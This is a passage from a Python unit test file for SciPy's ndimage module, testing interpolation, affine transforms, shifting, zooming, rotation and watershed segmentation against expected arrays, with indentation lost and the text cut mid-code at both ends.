for type_ in self.types:
data = numpy.ones([4], type_)
for order in range(2, 6):
out = ndimage.spline_filter(data, order)
assert_array_almost_equal(out, [1, 1, 1, 1])
def test_spline05(self):
for type_ in self.types:
data = numpy.ones([4, 4], type_)
for order in range(2, 6):
out = ndimage.spline_filter(data, order=order)
assert_array_almost_equal(out, [[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]])
def test_geometric_transform01(self):
data = numpy.array([1])
def mapping(x):
return x
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [1])
def test_geometric_transform02(self):
data = numpy.ones([4])
def mapping(x):
return x
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [1, 1, 1, 1])
def test_geometric_transform03(self):
data = numpy.ones([4])
def mapping(x):
return (x[0] - 1,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [0, 1, 1, 1])
def test_geometric_transform04(self):
data = numpy.array([4, 1, 3, 2])
def mapping(x):
return (x[0] - 1,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [0, 4, 1, 3])
def test_geometric_transform05(self):
data = numpy.array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]])
def mapping(x):
return (x[0], x[1] - 1)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1]])
def test_geometric_transform06(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0], x[1] - 1)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 4, 1, 3],
[0, 7, 6, 8],
[0, 3, 5, 3]])
def test_geometric_transform07(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0] - 1, x[1])
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[4, 1, 3, 2],
[7, 6, 8, 5]])
def test_geometric_transform08(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0] - 1, x[1] - 1)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_geometric_transform10(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0] - 1, x[1] - 1)
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
out = ndimage.geometric_transform(filtered, mapping, data.shape,
order=order, prefilter=False)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_geometric_transform13(self):
data = numpy.ones([2], numpy.float64)
def mapping(x):
return (x[0] // 2,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, [4], order=order)
assert_array_almost_equal(out, [1, 1, 1, 1])
def test_geometric_transform14(self):
data = [1, 5, 2, 6, 3, 7, 4, 4]
def mapping(x):
return (2 * x[0],)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, [4], order=order)
assert_array_almost_equal(out, [1, 2, 3, 4])
def test_geometric_transform15(self):
data = [1, 2, 3, 4]
def mapping(x):
return (x[0] / 2,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, [8], order=order)
assert_array_almost_equal(out[::2], [1, 2, 3, 4])
def test_geometric_transform16(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9.0, 10, 11, 12]]
def mapping(x):
return (x[0], x[1] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (3, 2),
order=order)
assert_array_almost_equal(out, [[1, 3], [5, 7], [9, 11]])
def test_geometric_transform17(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] * 2, x[1])
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (1, 4),
order=order)
assert_array_almost_equal(out, [[1, 2, 3, 4]])
def test_geometric_transform18(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] * 2, x[1] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (1, 2),
order=order)
assert_array_almost_equal(out, [[1, 3]])
def test_geometric_transform19(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0], x[1] / 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (3, 8),
order=order)
assert_array_almost_equal(out[..., ::2], data)
def test_geometric_transform20(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] / 2, x[1])
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (6, 4),
order=order)
assert_array_almost_equal(out[::2, ...], data)
def test_geometric_transform21(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] / 2, x[1] / 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (6, 8),
order=order)
assert_array_almost_equal(out[::2, ::2], data)
def test_geometric_transform22(self):
data = numpy.array([[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]], numpy.float64)
def mapping1(x):
return (x[0] / 2, x[1] / 2)
def mapping2(x):
return (x[0] * 2, x[1] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping1,
(6, 8), order=order)
out = ndimage.geometric_transform(out, mapping2,
(3, 4), order=order)
assert_array_almost_equal(out, data)
def test_geometric_transform23(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (1, x[0] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (2,), order=order)
out = out.astype(numpy.int32)
assert_array_almost_equal(out, [5, 7])
def test_geometric_transform24(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x, a, b):
return (a, x[0] * b)
for order in range(0, 6):
out = ndimage.geometric_transform(
data, mapping, (2,), order=order, extra_arguments=(1,),
extra_keywords={'b': 2})
assert_array_almost_equal(out, [5, 7])
def test_geometric_transform_endianness_with_output_parameter(self):
# geometric transform given output ndarray or dtype with
# non-native endianness. see issue #4127
data = numpy.array([1])
def mapping(x):
return x
for out in [data.dtype, data.dtype.newbyteorder(),
numpy.empty_like(data),
numpy.empty_like(data).astype(data.dtype.newbyteorder())]:
returned = ndimage.geometric_transform(data, mapping, data.shape,
output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, [1])
def test_geometric_transform_with_string_output(self):
data = numpy.array([1])
def mapping(x):
return x
out = ndimage.geometric_transform(data, mapping, output='f')
assert_(out.dtype is numpy.dtype('f'))
assert_array_almost_equal(out, [1])
def test_map_coordinates01(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
idx = numpy.indices(data.shape)
idx -= 1
for order in range(0, 6):
out = ndimage.map_coordinates(data, idx, order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_map_coordinates02(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
idx = numpy.indices(data.shape, numpy.float64)
idx -= 0.5
for order in range(0, 6):
out1 = ndimage.shift(data, 0.5, order=order)
out2 = ndimage.map_coordinates(data, idx, order=order)
assert_array_almost_equal(out1, out2)
def test_map_coordinates03(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]], order='F')
idx = numpy.indices(data.shape) - 1
out = ndimage.map_coordinates(data, idx)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
assert_array_almost_equal(out, ndimage.shift(data, (1, 1)))
idx = numpy.indices(data[::2].shape) - 1
out = ndimage.map_coordinates(data[::2], idx)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3]])
assert_array_almost_equal(out, ndimage.shift(data[::2], (1, 1)))
idx = numpy.indices(data[:, ::2].shape) - 1
out = ndimage.map_coordinates(data[:, ::2], idx)
assert_array_almost_equal(out, [[0, 0], [0, 4], [0, 7]])
assert_array_almost_equal(out, ndimage.shift(data[:, ::2], (1, 1)))
def test_map_coordinates_endianness_with_output_parameter(self):
# output parameter given as array or dtype with either endianness
# see issue #4127
data = numpy.array([[1, 2], [7, 6]])
expected = numpy.array([[0, 0], [0, 1]])
idx = numpy.indices(data.shape)
idx -= 1
for out in [data.dtype, data.dtype.newbyteorder(), numpy.empty_like(expected),
numpy.empty_like(expected).astype(expected.dtype.newbyteorder())]:
returned = ndimage.map_coordinates(data, idx, output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, expected)
def test_map_coordinates_with_string_output(self):
data = numpy.array([[1]])
idx = numpy.indices(data.shape)
out = ndimage.map_coordinates(data, idx, output='f')
assert_(out.dtype is numpy.dtype('f'))
assert_array_almost_equal(out, [[1]])
@pytest.mark.skipif('win32' in sys.platform or numpy.intp(0).itemsize < 8,
reason="do not run on 32 bit or windows (no sparse memory)")
def test_map_coordinates_large_data(self):
# check crash on large data
try:
n = 30000
a = numpy.empty(n**2, dtype=numpy.float32).reshape(n, n)
# fill the part we might read
a[n-3:, n-3:] = 0
ndimage.map_coordinates(a, [[n - 1.5], [n - 1.5]], order=1)
except MemoryError as e:
raise pytest.skip("Not enough memory available") from e
def test_affine_transform01(self):
data = numpy.array([1])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], order=order)
assert_array_almost_equal(out, [1])
def test_affine_transform02(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], order=order)
assert_array_almost_equal(out, [1, 1, 1, 1])
def test_affine_transform03(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], -1, order=order)
assert_array_almost_equal(out, [0, 1, 1, 1])
def test_affine_transform04(self):
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], -1, order=order)
assert_array_almost_equal(out, [0, 4, 1, 3])
def test_affine_transform05(self):
data = numpy.array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[0, -1], order=order)
assert_array_almost_equal(out, [[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1]])
def test_affine_transform06(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[0, -1], order=order)
assert_array_almost_equal(out, [[0, 4, 1, 3],
[0, 7, 6, 8],
[0, 3, 5, 3]])
def test_affine_transform07(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[-1, 0], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[4, 1, 3, 2],
[7, 6, 8, 5]])
def test_affine_transform08(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[-1, -1], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_affine_transform09(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
out = ndimage.affine_transform(filtered, [[1, 0], [0, 1]],
[-1, -1], order=order,
prefilter=False)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_affine_transform10(self):
data = numpy.ones([2], numpy.float64)
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5]], output_shape=(4,),
order=order)
assert_array_almost_equal(out, [1, 1, 1, 0])
def test_affine_transform11(self):
data = [1, 5, 2, 6, 3, 7, 4, 4]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2]], 0, (4,), order=order)
assert_array_almost_equal(out, [1, 2, 3, 4])
def test_affine_transform12(self):
data = [1, 2, 3, 4]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5]], 0, (8,), order=order)
assert_array_almost_equal(out[::2], [1, 2, 3, 4])
def test_affine_transform13(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9.0, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 2]], 0, (3, 2),
order=order)
assert_array_almost_equal(out, [[1, 3], [5, 7], [9, 11]])
def test_affine_transform14(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2, 0], [0, 1]], 0, (1, 4),
order=order)
assert_array_almost_equal(out, [[1, 2, 3, 4]])
def test_affine_transform15(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2, 0], [0, 2]], 0, (1, 2),
order=order)
assert_array_almost_equal(out, [[1, 3]])
def test_affine_transform16(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0.0], [0, 0.5]], 0,
(3, 8), order=order)
assert_array_almost_equal(out[..., ::2], data)
def test_affine_transform17(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5, 0], [0, 1]], 0,
(6, 4), order=order)
assert_array_almost_equal(out[::2, ...], data)
def test_affine_transform18(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5, 0], [0, 0.5]], 0,
(6, 8), order=order)
assert_array_almost_equal(out[::2, ::2], data)
def test_affine_transform19(self):
data = numpy.array([[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]], numpy.float64)
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5, 0], [0, 0.5]], 0,
(6, 8), order=order)
out = ndimage.affine_transform(out, [[2.0, 0], [0, 2.0]], 0,
(3, 4), order=order)
assert_array_almost_equal(out, data)
def test_affine_transform20(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0], [2]], 0, (2,),
order=order)
assert_array_almost_equal(out, [1, 3])
def test_affine_transform21(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2], [0]], 0, (2,),
order=order)
assert_array_almost_equal(out, [1, 9])
def test_affine_transform22(self):
# shift and offset interaction; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2]], [-1], (3,),
order=order)
assert_array_almost_equal(out, [0, 1, 2])
def test_affine_transform23(self):
# shift and offset interaction; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5]], [-1], (8,),
order=order)
assert_array_almost_equal(out[::2], [0, 4, 1, 3])
def test_affine_transform24(self):
# consistency between diagonal and non-diagonal case; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
out1 = ndimage.affine_transform(data, [2], -1, order=order)
out2 = ndimage.affine_transform(data, [[2]], -1, order=order)
assert_array_almost_equal(out1, out2)
def test_affine_transform25(self):
# consistency between diagonal and non-diagonal case; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
out1 = ndimage.affine_transform(data, [0.5], -1, order=order)
out2 = ndimage.affine_transform(data, [[0.5]], -1, order=order)
assert_array_almost_equal(out1, out2)
def test_affine_transform26(self):
# test homogeneous coordinates
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
tform_original = numpy.eye(2)
offset_original = -numpy.ones((2, 1))
tform_h1 = numpy.hstack((tform_original, offset_original))
tform_h2 = numpy.vstack((tform_h1, [[0, 0, 1]]))
out1 = ndimage.affine_transform(filtered, tform_original,
offset_original.ravel(),
order=order, prefilter=False)
out2 = ndimage.affine_transform(filtered, tform_h1, order=order,
prefilter=False)
out3 = ndimage.affine_transform(filtered, tform_h2, order=order,
prefilter=False)
for out in [out1, out2, out3]:
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_affine_transform27(self):
# test valid homogeneous transformation matrix
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
tform_h1 = numpy.hstack((numpy.eye(2), -numpy.ones((2, 1))))
tform_h2 = numpy.vstack((tform_h1, [[5, 2, 1]]))
assert_raises(ValueError, ndimage.affine_transform, data, tform_h2)
def test_affine_transform_1d_endianness_with_output_parameter(self):
# 1d affine transform given output ndarray or dtype with
# either endianness. see issue #7388
data = numpy.ones((2, 2))
for out in [numpy.empty_like(data),
numpy.empty_like(data).astype(data.dtype.newbyteorder()),
data.dtype, data.dtype.newbyteorder()]:
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
returned = ndimage.affine_transform(data, [1, 1], output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, [[1, 1], [1, 1]])
def test_affine_transform_multi_d_endianness_with_output_parameter(self):
# affine transform given output ndarray or dtype with either endianness
# see issue #4127
data = numpy.array([1])
for out in [data.dtype, data.dtype.newbyteorder(),
numpy.empty_like(data),
numpy.empty_like(data).astype(data.dtype.newbyteorder())]:
returned = ndimage.affine_transform(data, [[1]], output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, [1])
def test_affine_transform_with_string_output(self):
data = numpy.array([1])
out = ndimage.affine_transform(data, [[1]], output='f')
assert_(out.dtype is numpy.dtype('f'))
assert_array_almost_equal(out, [1])
def test_shift01(self):
data = numpy.array([1])
for order in range(0, 6):
out = ndimage.shift(data, [1], order=order)
assert_array_almost_equal(out, [0])
def test_shift02(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.shift(data, [1], order=order)
assert_array_almost_equal(out, [0, 1, 1, 1])
def test_shift03(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.shift(data, -1, order=order)
assert_array_almost_equal(out, [1, 1, 1, 0])
def test_shift04(self):
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.shift(data, 1, order=order)
assert_array_almost_equal(out, [0, 4, 1, 3])
def test_shift05(self):
data = numpy.array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]])
for order in range(0, 6):
out = ndimage.shift(data, [0, 1], order=order)
assert_array_almost_equal(out, [[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1]])
def test_shift06(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.shift(data, [0, 1], order=order)
assert_array_almost_equal(out, [[0, 4, 1, 3],
[0, 7, 6, 8],
[0, 3, 5, 3]])
def test_shift07(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.shift(data, [1, 0], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[4, 1, 3, 2],
[7, 6, 8, 5]])
def test_shift08(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.shift(data, [1, 1], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_shift09(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
out = ndimage.shift(filtered, [1, 1], order=order, prefilter=False)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_zoom1(self):
for order in range(0, 6):
for z in [2, [2, 2]]:
arr = numpy.array(list(range(25))).reshape((5, 5)).astype(float)
arr = ndimage.zoom(arr, z, order=order)
assert_equal(arr.shape, (10, 10))
assert_(numpy.all(arr[-1, :] != 0))
assert_(numpy.all(arr[-1, :] >= (20 - eps)))
assert_(numpy.all(arr[0, :] <= (5 + eps)))
assert_(numpy.all(arr >= (0 - eps)))
assert_(numpy.all(arr <= (24 + eps)))
def test_zoom2(self):
arr = numpy.arange(12).reshape((3, 4))
out = ndimage.zoom(ndimage.zoom(arr, 2), 0.5)
assert_array_equal(out, arr)
def test_zoom3(self):
arr = numpy.array([[1, 2]])
out1 = ndimage.zoom(arr, (2, 1))
out2 = ndimage.zoom(arr, (1, 2))
assert_array_almost_equal(out1, numpy.array([[1, 2], [1, 2]]))
assert_array_almost_equal(out2, numpy.array([[1, 1, 2, 2]]))
def test_zoom_affine01(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
out = ndimage.affine_transform(data, [0.5, 0.5], 0,
(6, 8), order=order)
assert_array_almost_equal(out[::2, ::2], data)
def test_zoom_infinity(self):
# Ticket #1419 regression test
dim = 8
ndimage.zoom(numpy.zeros((dim, dim)), 1./dim, mode='nearest')
def test_zoom_zoomfactor_one(self):
# Ticket #1122 regression test
arr = numpy.zeros((1, 5, 5))
zoom = (1.0, 2.0, 2.0)
out = ndimage.zoom(arr, zoom, cval=7)
ref = numpy.zeros((1, 10, 10))
assert_array_almost_equal(out, ref)
def test_zoom_output_shape_roundoff(self):
arr = numpy.zeros((3, 11, 25))
zoom = (4.0 / 3, 15.0 / 11, 29.0 / 25)
out = ndimage.zoom(arr, zoom)
assert_array_equal(out.shape, (4, 15, 29))
def test_rotate01(self):
data = numpy.array([[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 0)
assert_array_almost_equal(out, data)
def test_rotate02(self):
data = numpy.array([[0, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0],
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
assert_array_almost_equal(out, expected)
def test_rotate03(self):
data = numpy.array([[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0],
[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
assert_array_almost_equal(out, expected)
def test_rotate04(self):
data = numpy.array([[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90, reshape=False)
assert_array_almost_equal(out, expected)
def test_rotate05(self):
data = numpy.empty((4, 3, 3))
for i in range(3):
data[:, :, i] = numpy.array([[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
for i in range(3):
assert_array_almost_equal(out[:, :, i], expected)
def test_rotate06(self):
data = numpy.empty((3, 4, 3))
for i in range(3):
data[:, :, i] = numpy.array([[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
for i in range(3):
assert_array_almost_equal(out[:, :, i], expected)
def test_rotate07(self):
data = numpy.array([[[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]]] * 2, dtype=numpy.float64)
data = data.transpose()
expected = numpy.array([[[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0],
[0, 0, 0]]] * 2, dtype=numpy.float64)
expected = expected.transpose([2, 1, 0])
for order in range(0, 6):
out = ndimage.rotate(data, 90, axes=(0, 1))
assert_array_almost_equal(out, expected)
def test_rotate08(self):
data = numpy.array([[[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]]] * 2, dtype=numpy.float64)
data = data.transpose()
expected = numpy.array([[[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0]]] * 2, dtype=numpy.float64)
expected = expected.transpose()
for order in range(0, 6):
out = ndimage.rotate(data, 90, axes=(0, 1), reshape=False)
assert_array_almost_equal(out, expected)
def test_rotate09(self):
data = numpy.array([[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]] * 2, dtype=numpy.float64)
with assert_raises(ValueError):
ndimage.rotate(data, 90, axes=(0, data.ndim))
def test_rotate10(self):
data = numpy.arange(45, dtype=numpy.float64).reshape((3, 5, 3))
# The output of ndimage.rotate before refactoring
expected = numpy.array([[[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[6.54914793, 7.54914793, 8.54914793],
[10.84520162, 11.84520162, 12.84520162],
[0.0, 0.0, 0.0]],
[[6.19286575, 7.19286575, 8.19286575],
[13.4730712, 14.4730712, 15.4730712],
[21.0, 22.0, 23.0],
[28.5269288, 29.5269288, 30.5269288],
[35.80713425, 36.80713425, 37.80713425]],
[[0.0, 0.0, 0.0],
[31.15479838, 32.15479838, 33.15479838],
[35.45085207, 36.45085207, 37.45085207],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]]])
out = ndimage.rotate(data, angle=12, reshape=False)
assert_array_almost_equal(out, expected)
def test_watershed_ift01(self):
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.int8)
out = ndimage.watershed_ift(data, markers, structure=[[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
expected = [[-1, -1, -1, -1, -1, -1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, 1, 1, 1, 1, 1, -1],
[-1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1]]
assert_array_almost_equal(out, expected)
def test_watershed_ift02(self):
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], numpy.int8)
out = ndimage.watershed_ift(data, markers)
expected = [[-1, -1, -1, -1, -1, -1, -1],
